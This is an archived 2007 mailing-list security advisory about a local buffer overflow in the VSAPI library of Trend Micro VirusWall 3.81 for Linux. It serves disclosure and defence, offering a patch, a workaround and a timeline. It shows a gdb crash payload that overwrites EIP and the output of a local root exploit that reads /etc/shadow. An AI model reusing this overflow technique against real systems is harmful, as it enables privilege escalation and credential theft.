lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200701252148.30706.sebastian.wolfgarten@gmx.net>
Date: Thu, 25 Jan 2007 21:48:30 +0100
From: Sebastian Wolfgarten <sebastian.wolfgarten@....net>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Buffer overflow in VSAPI library of Trend Micro VirusWall 3.81 for Linux

I - TITLE

Security advisory: Buffer overflow in VSAPI library of Trend Micro VirusWall 
3.81 for Linux

II - SUMMARY

Description: Local buffer overflow vulnerability in VSAPI library allows 
arbitrary code execution and leads to privilege escalation

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), 
http://www.devtarget.org

Date: January 25th, 2007

Severity: Medium

References: http://www.devtarget.org/trendmicro-advisory-01-2007.txt

III - OVERVIEW

The Trend Micro VirusWall is a software solution to block viruses, spyware, 
spam and various other kinds of threats at the Internet gateway. More 
information about the product can be found online at 
http://www.trendmicro.com/en/products/gateway/isvw/evaluate/overview.htm.

IV - DETAILS

The product "InterScan VirusWall 3.81 for Linux" ships a legacy library 
called "libvsapi.so" which is vulnerable to a memory corruption 
vulnerability. One of the applications that apparently uses this library is 
called "vscan" which is set suid root by default. It was discovered that this 
supporting program is prone to a classic buffer overflow vulnerability when a 
particularly long command-line argument is being passed and the application 
utilizes the flawed library to attempt to copy that data into a finite 
buffer. On a Debian 3.1 test system for instance an attacker is required to 
supply 1116 + 4 bytes to completely overwrite the EIP register and thus 
execute arbitrary code with root level privileges:

# /opt/trend/ISBASE/IScan.BASE/vscan -v
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
        Pattern version 684
        Pattern number 56446
No scan target specified!! do nothing.

# gdb /opt/trend/ISBASE/IScan.BASE/vscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details. This GDB was configured as "i386-linux"...(no debugging symbols
found) Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x1116 . "B"x4'`
Starting program: /opt/trend/ISBASE/IScan.BASE/vscan `perl -e 'print
"A"x1116 . "B"x4'`
(no debugging symbols found)
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
        Pattern version 684
        Pattern number 56446

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info registers
eax            0xffffffff       -1
ecx            0x24     36
edx            0x40277560       1076327776
ebx            0xbffffa03       -1073743357
esp            0xbffff818       0xbffff818
ebp            0x41414141       0x41414141
esi            0xbffff838       -1073743816
edi            0x804f008        134541320
eip            0x42424242       0x42424242
eflags         0x287    647
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

V - ANALYSIS

The severity of this vulnerability is probably "medium" as by default the 
vscan file is only executable by the root user as well as members of 
the "iscan" group which is created during the installation of the software:

# ls -la /opt/trend/ISBASE/IScan.BASE/vscan
-r-sr-x---  1 root iscan 24400 2003-12-20 03:53
/opt/trend/ISBASE/IScan.BASE/vscan

However administrators may potentially have changed the default permissions 
and thus granted all local users the privilege to execute the file. If this 
library is also used by other applications they may also be flawed 
(unchecked).

VI - EXPLOIT CODE

An exploit for this vulnerability is attached to this email and can also be 
found online at http://www.devtarget.org/tmvwall381v3_exp.c. It was 
successfully tested on Debian Linux 3.1 with kernel 2.6.8 and leads to a 
local privilege escalation:

sebastian@...ian31:~$ ./tmvwall381v3_exp

Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)
Author: Sebastian Wolfgarten, <sebastian@...fgarten.com>
Date: January 3rd, 2007

Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way,
your current user id is 5002.

Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege
level with id or whoami!

Virus Scanner v3.1, VSAPI v8.310-1002
Trend Micro Inc. 1996,1997
Pattern number 4.155.00

sh-2.05b# id
uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan)

sh-2.05b# cat /etc/shadow

root:***REMOVED***:13372:0:99999:7:::
daemon:*:13372:0:99999:7:::
bin:*:13372:0:99999:7:::
sys:*:13372:0:99999:7:::
sync:*:13372:0:99999:7:::
games:*:13372:0:99999:7:::

[...]

iscan:!:13500:0:99999:7:::
sebastian:***REMOVED***:13500:0:99999:7:::

VII - WORKAROUND/FIX

To address this problem, the vendor has released a patch called "InterScan 
VirusWall 3.81 for Linux Security Patch - VSAPI module" which is available at 
http://www.trendmicro.com/download/product.asp?productid=13&show=patch and 
which will replace the flawed library libvsapi.so with a newer version. Hence 
all users of the VirusWall product are asked to test and install this patch 
as soon as possible. Trend Micro also created a knowledge base article that 
covers the problem (see 
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034124&id=EN-1034124). 

Furthermore as a temporary workaround one may also simply remove the suid bit 
from the vscan file and thus render any attack virtually useless by executing

# chmod -s /opt/trend/ISBASE/IScan.BASE/vscan

The same holds true for any other (suid root) application that uses this 
library.

VIII - DISCLOSURE TIMELINE

02. January 2007 - Notified security@...ndmicro.com
05. January 2007 - Vulnerability confirmed
21. January 2007 - Release of patch
25. January 2007 - Public disclosure 

View attachment "tmvwall381v3_exp.c" of type "text/x-csrc" (4861 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ